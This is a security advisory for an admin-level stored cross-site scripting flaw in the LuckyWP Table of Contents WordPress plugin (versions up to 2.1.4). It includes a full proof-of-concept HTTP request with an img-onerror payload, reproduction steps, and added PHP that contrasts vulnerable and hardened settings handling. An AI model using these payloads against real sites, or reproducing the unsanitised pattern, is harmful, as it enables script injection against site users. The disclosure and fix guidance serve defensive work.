wpvulndb | Sławomir Zakrzewski, Maksymilian Kubiak (AFINE) | WPVDB-ID: ECD615F7-946E-45AF-A610-0654A243B1DC
History: May 24, 2024 - 12:00 a.m.

LuckyWP Table of Contents <= 2.1.4 - Admin+ Stored XSS

Published: 2024-05-24 00:00:00
Source: wpscan.com
Tags: plugin exploit, stored xss, unfiltered_html, admin privilege, security vulnerability, software

AI Score: 5.5 Medium (Confidence: High)
EPSS: 0.0004 Low (Percentile: 9.1%)

Description: The plugin does not sanitise and escape some of its settings, which could allow high-privilege users such as admins to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup).

PoC

Request:

POST /wordpress/wp-admin/options.php HTTP/1.1
Host: localhost:8888
Content-Length: 854
Origin: http://localhost:8888
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost:8888/wordpress/wp-admin/options-general.php?page=lwptoc_settings&tab=general
Cookie: wordpress_2b7738476b2cfaf3b5454b1e89821e63=admin%7C1708766444%7C0GzMU59sZAvkYhj8ehqGOkvfh3o3aydrJhg1ZMemE1P%7C22974de7e91d95312e8cefa5f5c339f1696e50a12ec00e68ab0488447c2cafbf; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=pl_PL; wordpress_logged_in_2b7738476b2cfaf3b5454b1e89821e63=admin%7C1708766444%7C0GzMU59sZAvkYhj8ehqGOkvfh3o3aydrJhg1ZMemE1P%7C2d06dac1007e1bc6a183a19f4f01d66fecd7b809d5785a7974a3edc1a0dca85d; wp-settings-1=libraryContent%3Dupload%26editor%3Dhtml%26post_dfw%3Doff%26posts_list_mode%3Dlist; wp-settings-time-1=1708593645
Connection: close

option_page=lwptoc_general&action=update&_wpnonce=e60641c07f&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dlwptoc_settings%26tab%3Dgeneral&lwptoc_general%5Bmin%5D=&lwptoc_general%5Bdepth%5D=6&lwptoc_general%5Bhierarchical%5D=0&lwptoc_general%5Bhierarchical%5D=1&lwptoc_general%5Bnumeration%5D=decimalnested&lwptoc_general%5BnumerationSuffix%5D=none&lwptoc_general%5Btitle%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&lwptoc_general%5Btoggle%5D=0&lwptoc_general%5Btoggle%5D=1&lwptoc_general%5BlabelShow%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%282%29%3E&lwptoc_general%5BlabelHide%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E&lwptoc_general%5BhideItems%5D=0&lwptoc_general%5BhideItems%5D=1&lwptoc_general%5BsmoothScroll%5D=0&lwptoc_general%5BsmoothScroll%5D=1&lwptoc_general%5BsmoothScrollOffset%5D=&submit=Zapisz+zmiany

Response:

HTTP/1.1 200 OK
Server: nginx/1.19.2
Date: Thu, 22 Feb 2024 09:42:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.4.33
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Referrer-Policy: strict-origin-when-cross-origin
X-Frame-Options: SAMEORIGIN
Content-Length: 48359

[…] "> Label Hide | "> | "> […]

Steps:

1. Go to the plugin’s settings.
2. Insert the following payload into the Title, Label Show, and Label Hide fields: "><img src=x onerror=alert(1)> (the request above sends it URL-encoded, with alert(1), alert(2) and alert(3) respectively).
3. Add the Table of Contents to a post/page using the Block Editor.
4. The alert will trigger.
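As an added illustration (not code from the LuckyWP Table of Contents plugin or from the advisory authors), the following PHP contrasts a settings registration with no sanitize_callback against one that sanitises the posted array on save and escapes it on output. The option name `lwptoc_general` and the field keys are taken from the PoC request; the function names, flag handling and markup are assumptions.

```php
<?php
// Added illustration (not the plugin's own code). Assumed: the option
// 'lwptoc_general' (option_page in the PoC request) is an array whose free-text
// keys title/labelShow/labelHide are later echoed into the table-of-contents markup.

// Vulnerable pattern: no sanitize_callback, so options.php stores whatever the
// form posts verbatim; any later unescaped echo becomes stored XSS regardless
// of whether the saving user holds unfiltered_html.
function lwptoc_example_register_vulnerable() {
    register_setting( 'lwptoc_general', 'lwptoc_general' );
}

// Hardened pattern: sanitise on save, for every user and every key.
function lwptoc_example_sanitize( $input ) {
    $input = is_array( $input ) ? $input : array();
    $clean = array();
    foreach ( array( 'title', 'labelShow', 'labelHide' ) as $key ) {
        // wp_strip_all_tags inside sanitize_text_field removes the <img ...>
        // element from the PoC payload, leaving only the text '">'.
        $clean[ $key ] = isset( $input[ $key ] ) ? sanitize_text_field( $input[ $key ] ) : '';
    }
    $clean['depth'] = isset( $input['depth'] ) ? max( 1, min( 6, absint( $input['depth'] ) ) ) : 6;
    foreach ( array( 'hierarchical', 'toggle', 'hideItems', 'smoothScroll' ) as $flag ) {
        $clean[ $flag ] = empty( $input[ $flag ] ) ? 0 : 1;
    }
    return $clean;
}

function lwptoc_example_register_hardened() {
    register_setting( 'lwptoc_general', 'lwptoc_general', array(
        'type'              => 'array',
        'sanitize_callback' => 'lwptoc_example_sanitize',
    ) );
}
add_action( 'admin_init', 'lwptoc_example_register_hardened' );

// Output escaping is still required: the stored '">' must not be able to close
// an attribute, so escape for the exact context (text node vs. attribute).
function lwptoc_example_render_header() {
    $opts = (array) get_option( 'lwptoc_general', array() );
    printf(
        '<div class="toc-header"><span>%s</span> <a href="#" data-show="%s" data-hide="%s">%s</a></div>',
        esc_html( isset( $opts['title'] ) ? $opts['title'] : '' ),
        esc_attr( isset( $opts['labelShow'] ) ? $opts['labelShow'] : '' ),
        esc_attr( isset( $opts['labelHide'] ) ? $opts['labelHide'] : '' ),
        esc_html( isset( $opts['labelShow'] ) ? $opts['labelShow'] : '' )
    );
}
```

Sanitising on save alone would still leave a stored `">` that a context-blind echo could misplace, which is why both halves are shown together.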

